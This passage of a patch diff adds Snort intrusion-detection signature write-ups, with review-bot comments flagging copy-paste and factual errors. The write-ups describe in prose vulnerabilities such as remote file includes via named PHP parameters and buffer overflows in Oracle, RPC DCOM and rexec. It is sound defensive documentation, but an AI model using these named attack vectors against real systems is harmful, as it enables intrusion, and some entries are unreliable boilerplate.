+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_sp_addp_0awi.asp
+
+--
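Review bot: the paragraph `+This connection can either be a legitimate telnet connection or the` / `+result of spawning a remote shell as a consequence of a successful` / `+network exploit.` reads as copied from a telnet rule and does not apply to an SQL database command; remove it or reword it for the database session. Under Attack Scenarios, `+Simple. These are SQL database commands.` is an Ease of Attack answer rather than a scenario; say what the event represents (a privileged stored-procedure call reaching the server from outside) instead. Minor: `+investigate the server for signs of compromise` is missing its full stop.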
--- /dev/null
+++ b/doc/signatures/1575.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1575
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2846.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2846
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure repcat_import_check
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
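Review bot: same line-break-before-period artifact as the other Oracle procedure entries: `+vulnerability in the procedure repcat_import_check` is followed by a line that is just `+. This procedure is included in`; join the lines so the sentence reads "... the procedure repcat_import_check. This procedure is included in sys.dbms_repcat_sna_utl." Additional References is empty; cite the vendor alert for this procedure.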
--- /dev/null
+++ b/doc/signatures/2480.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a service via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a service
+on a system using SMB across the network.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may try to deny services to other users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
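Review bot: the Sid in the file body does not match the filename: the hunk creates `doc/signatures/2480.txt` but the Sid field reads `+2176`. One of the two is wrong and a lookup by SID will show the wrong documentation; confirm which rule this text describes and correct the mismatch. Minor: there is a double blank line after the Sid value, `+Serious.` under Impact does not say what is affected (Detailed Information describes a remote service shutdown, i.e. loss of that service for the host's users), and Additional References holds two empty lines before the closing `--`.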
--- /dev/null
+++ b/doc/signatures/3426.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3426
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
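Review bot: the Attack Scenarios entry (`An attacker may make a request for a file with an overly long filename via a network share`) does not match Detailed Information, which describes a malformed DCOM request sent to an RPC port; both should describe the same vector, otherwise an analyst reading only the scenario will go looking at SMB file traffic instead of RPC. `Expoit code exists` is a typo for `Exploit`, and Additional References is empty although this is a published Microsoft bulletin; add the bulletin and CVE links so the patch named in Corrective Action can be identified.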
--- /dev/null
+++ b/doc/signatures/1124.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1124
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
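Review bot: this entry never says what sid 1124 actually matches; Summary, Detailed Information and Attack Scenarios are generic web-server boilerplate (`Many known vulnerabilities exist for each implementation and the attack scenarios are legion`) reused word for word in other files of this patch, for example 1376.txt. Name the URI, parameter or request pattern the rule looks for and the product it belongs to; without that, `False Positives: None known` cannot be evaluated by anyone tuning the rule.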
--- /dev/null
+++ b/doc/signatures/1354.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1354
+
+--
+Summary:
+Attempted nasm command access via web. 
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a program source on a host. NASM is the Netwide Assembler which is capable of compiling a variety of sources on a variety of platforms into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'nasm' in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1353
+
+--
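Review bot: Detailed Information describes NASM as `capable of compiling a variety of sources on a variety of platforms`; NASM is an x86 assembler, so the scenario is an attacker assembling uploaded x86 source into a binary on the host. Typos: `compiile`, and `outside of it's designated web root` should be `its`. The securelevel sentence is circular (`setting the systems runtime securelevel also prevents the securelevel from being changed`); the point is that the immutable flag cannot be cleared while the securelevel is raised, and the securelevel can only be raised at runtime. The file also lacks the Affected Systems section every other entry has, and since Attack Scenarios says any `HTTP request that contains 'nasm' in the URI` fires the rule, False Positives should not be `None Known`.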
--- /dev/null
+++ b/doc/signatures/2113.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid:
+2113
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in the rexec daemon.
+
+--
+Impact:
+Serious.  An attacker may gain escalated privileges offering super user access on the affected host.
+
+--
+Detailed Information:
+Rexec offers users the ability to execute commands on a host from remote locations.
+
+A vulnerability exists such that an when an overly long username is supplied to the rexec daemon, a buffer overflow condition may occur thus presenting the attacker with the opportunity to execute arbitrary code and possibly gain escalated privileges on the target host.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disallow the use of rexec commands from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
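Review bot: `Attack Scenarios: Simple.` is an Ease of Attack answer, not a scenario; the scenario is the one in Detailed Information, a remote client supplying an overly long username in the rexec request, and it belongs here. In that same paragraph `an when an overly long username is supplied` has a stray `an`. There is no Affected Systems section and no reference, so the reader cannot tell which rexec daemon or platform is affected or what `the latest non-affected version` is.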
--- /dev/null
+++ b/doc/signatures/1265.txt
@@ -0,0 +1,60 @@
+Rule:
+
+Sid:
+1265
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) cmsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port cmsd is using.  Attackers can also learn what versions of the cmsd protocol are accepted by cmsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as cmsd run.  The cmsd RPC service implements the Calendar Manager Service daemon that is often distributed with the Common Desktop Environment (CDE) and OpenWindows.  Several buffer overflow vulnerabilities have been associated with cmsd.
+
+--
+Affected Systems:
+Any host running the RPC service cmsd.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where cmsd runs.  This may be a precursor to accessing cmsd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access cmsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for cmsd, not probes of the cmsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the cmsd service itself. An attacker may attempt to go directly to the cmsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS17
+
+
+--
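Review bot: the `--` separator after `Rule:` is missing (the file goes straight from `Rule:` to `Sid:`), which will break any tooling that splits these files on the separator line. The content itself is good; the False Negatives note that a direct connection to the cmsd port bypasses the portmapper check is exactly the caveat a tuner needs.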
--- /dev/null
+++ b/doc/signatures/100000392.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000392
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "vacadm.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "vacadm.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
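Review bot: the third Detailed Information paragraph (`Some applications do not perform stringent checks when validating the credentials of a client host...`) is authentication boilerplate unrelated to a remote file include in `vacadm.php`, and the Attack Scenarios text about supplying credentials to `an authentication mechanism` comes from the same template; replace both with the actual vector, a request that sets `babInstallPath` to an attacker-controlled URL so the interpreter fetches and executes that file. `exploitation attempt has been attempted` is redundant and `ona web server` is a typo. Corrective Action could also mention the interpreter-side mitigation, disabling remote URL includes in the PHP configuration, which stops this class of bug regardless of patch level.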
--- /dev/null
+++ b/doc/signatures/3103.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3103
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
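Review bot: Affected Systems lists `Microsoft Windows Server 2000`; the product is Windows 2000 Server, and the NT entry should say which release is meant. There is a stray blank line between `--` and `Corrective Action:` that the other files do not have. Additional References is empty even though the text describes a specific unchecked-buffer bug in the License Logging Service; add the Microsoft bulletin so `Apply the appropriate vendor supplied patches` points at something.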
--- /dev/null
+++ b/doc/signatures/121-2.txt
@@ -0,0 +1,98 @@
+
+
+Rule:
+
+--
+Sid:
+121-2
+
+--
+Summary:
+This event is generated when the pre-processor flow-portscan detects
+network traffic that may constitute an attack. Specifically a sliding
+scale scanner limit exceeded event was generated.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the flow-portscan pre-processor detects
+network traffic that may consititute an attack.
+
+The flow-portscan pre-processor uses a flow based technique to identify
+portscanning in one-to-many and many-to-one scenarios based on flow
+creation in the flow pre-processor.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.flow-portscan in the docs directory
+of the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+detailed instructions and examples on how to tune and use the
+pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Green <cmg@snort.org>
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
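Review bot: typos `reconnaisance` and `consititute`, and `Apply any appropriate vendor supplied patches as appropriate` says `appropriate` twice. The file opens with two blank lines before `Rule:`, unlike the other entries. Since the Summary says this is the `sliding scale scanner limit exceeded` case, Detailed Information should say what that threshold is (how many distinct ports or hosts within the flow-portscan window) or at least name the option in README.flow-portscan, because that is the value an operator changes when the False Positives section tells them to tune out an audit.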
--- /dev/null
+++ b/doc/signatures/100000661.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000661
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "email" parameter in the "edit.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
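Review bot: the Impact section is copied from the remote file include template and overstates a cross site scripting bug: `system integrity compromise`, `unauthorized administrative access to the server` and server-side `execution of arbitrary code` are not outcomes of reflected script in the `email` parameter of `edit.php`. State the actual impact, script running in the victim's browser with session or cookie theft and actions taken with the victim's privileges in the guestbook, which is what the Attack Scenarios entry (`a malicious link designed to steal information from a user clicking on that link`) already describes. The second Detailed Information paragraph about executing `system binaries` should go for the same reason. Blank lines are missing before the `--` separators after `Sid:`, `Affected Systems:` and `Contributors:`.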
--- /dev/null
+++ b/doc/signatures/1376.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1376
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
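Review bot: this file is a verbatim copy of 1124.txt apart from the sid; nothing in it identifies what signature 1376 matches. Add the specific URI or pattern the rule detects, the product involved and a reference, otherwise the entry documents nothing.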
--- /dev/null
+++ b/doc/signatures/2114.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2114
+
+--
+Summary:
+This event is generated when a remote attacker attempts to send a large number of null characters to port 512 on an internal server. This may indicate an attempt to exploit a buffer overflow condition in Pragma Systems TelnetServer 2000.
+
+--
+Impact:
+Denial of service by anonymous, remote users.
+
+--
+Detailed Information:
+Pragma Systems TelnetServer 2000 contains a vulnerability where a large number of null characters sent to the Telnet server's rexec port can crash the server. 
+
+--
+Affected Systems:
+Pragma Systems TelnetServer 2000
+
+--
+Attack Scenarios:
+A remote attacker can send messages that contain a large number of null characters to the Telnet server, causing the server to crash.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to TelnetServer 2000 build 2 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1605
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0708
+
+--
--- /dev/null
+++ b/doc/signatures/1690.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1690
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
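Review bot: the sentence `This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit` comes from the shell-command rule template and makes no sense for a rule matching an Oracle database command on `$ORACLE_PORTS`; drop it. `Attack Scenarios: Simple. These are Oracle database commands.` is not a scenario; the scenario is an attacker who already holds database credentials, or has hijacked a session, issuing one of the privileged commands Detailed Information describes. The ORACLE_PORTS advice appears twice (Detailed Information and False Negatives) with different justifications, Windows listeners versus port renegotiation after the initial connect; keep one, and note that setting it to `any` inspects all traffic for these strings and raises the false positive rate. Also `Sid: 1690` is on one line where every other file puts the number on its own line, and the second Corrective Action sentence lacks a period.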
--- /dev/null
+++ b/doc/signatures/100000467.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000467
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "WebprojectDB" application running on a webserver. 
+Access to the file "nav.php" using a remote file being passed as the "INCDIR" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "INCDIR" parameter in the "nav.php" script used by the 
+"WebprojectDB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using WebprojectDB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
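Review bot: same template problems as the other remote file include entries in this patch: the third Detailed Information paragraph and the Attack Scenarios text are about credential validation and `an authentication mechanism`, which has nothing to do with passing a remote URL in the `INCDIR` parameter of `nav.php`; replace them with the actual vector, a request whose `INCDIR` value points at an attacker-hosted file that the interpreter fetches and executes. `exploitation attempt has been attempted` is redundant and `ona web server` is a typo; blank lines are missing before the `--` separators after `Sid:`, `Affected Systems:` and `Contributors:`.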
--- /dev/null
+++ b/doc/signatures/112-4.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+112-4
+
+--
+Summary:
+This event is generated when the pre-processor spp_arpspoof detects
